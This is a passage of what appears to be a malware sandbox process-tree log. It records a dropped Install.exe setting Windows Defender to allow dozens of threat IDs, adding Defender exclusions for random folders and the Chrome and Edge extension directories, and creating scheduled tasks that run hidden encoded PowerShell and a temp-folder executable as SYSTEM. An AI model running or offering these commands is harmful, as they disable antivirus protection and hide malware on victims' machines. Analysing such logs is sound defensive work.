\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:3728
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3460
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4296
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2824
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5024
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:2312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:840
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:412
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3048
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3080
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2192
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4932
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2172
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1196
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:864
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:4548
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"2⤵PID:976
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:323⤵PID:2552
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:324⤵PID:1892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ADJLsahCU" /t REG_DWORD /d 0 /reg:643⤵PID:3488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:323⤵PID:1644
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR" /t REG_DWORD /d 0 /reg:643⤵PID:1540
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:323⤵PID:1392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DQANlvmTAvZU2" /t REG_DWORD /d 0 /reg:643⤵PID:4312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:323⤵PID:4920
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PZjcxajBIsNTC" /t REG_DWORD /d 0 /reg:643⤵PID:3448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:323⤵PID:3088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mWJfrhglotUn" /t REG_DWORD /d 0 /reg:643⤵PID:1148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:323⤵PID:2132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\VyWMmqtuSNndeGVB /t REG_DWORD /d 0 /reg:643⤵PID:596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:1084
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3492
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3968
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:323⤵PID:1892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA /t REG_DWORD /d 0 /reg:643⤵PID:2552
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:323⤵PID:3488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WPGfhLqOzAIwKSwi /t REG_DWORD /d 0 /reg:643⤵PID:660
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "giyUCfduG" /SC once /ST 05:52:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1532 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "giyUCfduG"2⤵PID:1876
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "giyUCfduG"2⤵PID:2132
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 13:17:04 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\HePgjOk.exe\" GH /wMqFdidnv 385118 /S" /V1 /F2⤵
- Creates scheduled task(s)
PID:3488 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\7zSADB0.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSADB0.tmp\Install.exe it /BFjdidvFgi 385118 /S1⤵PID:1560
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:4296
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:1040
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:976
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2568
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:3916
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:2952
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:3708
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:3220
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:4996
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:4016
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:1148
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:1132
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:3080
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1064
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:840
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
PID:5048 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:1784
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵PID:1752
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:1908
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1624
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3408
-
